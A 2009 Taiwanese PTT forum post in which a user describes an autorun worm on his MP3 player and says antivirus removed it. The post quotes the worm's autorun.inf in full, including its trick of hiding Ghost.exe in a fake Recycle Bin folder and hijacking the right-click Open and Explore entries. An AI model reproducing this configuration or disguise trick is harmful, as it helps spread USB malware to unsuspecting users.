[心得] 湖義病毒

看板MP3-player作者ummba (accumulation)時間16年前 (2009/10/14 03:07)推噓3(3推 0噓 0→)

留言3則, 3人參與討論串1/1

其實不是湖"義"啦！不過不重要這是發生在我的創見MP320上面的故事… 九月初不知道從哪裡感染了這個病毒。後來在網上找資料發現這個病毒會在根目錄下產生autorun.inf檔。從以下的autorun可以看到。病毒藏在mp3裡的資源回收筒。然後會把右鍵→"開啟(O)"變成「湖羲(O)」右鍵→"檔案總管(X)"變成「訧埭奪燴(X)」 [autorun] OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe shell\open=湖羲(&O) shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe Bak shell\open\Default=1 shell\explore=訧埭奪燴け(&X) shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe Bak 但是這次沒有什麼災情，原因是中毒之後回家插電腦，小紅傘馬上把病毒擋下來刪掉了。藏在recyle裡的Ghost.exe還有usbmon.dll還有ferry.exe 分別是TR/Drop.Agent.NZ、TR/Agent.gle及WORM/Autorun.KB.1 科科。還好有小紅傘。只是下次不知道要拿什麼東西來裝檔案去影印店和-4的iBon 報告完畢 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 61.229.99.137

推

isimaamenaka

10/14 11:06, , 1^F

10/14 11:06, 1^F

推

AviraTW

10/14 12:14, , 2^F

10/14 12:14, 2^F

推

cooljoe1985

10/15 14:19, , 3^F

10/15 14:19, 3^F

‣ 返回看板[ MP3-player ] 資訊

‣ 更多 ummba 的文章

文章代碼(AID): #1ArC_keo (MP3-player)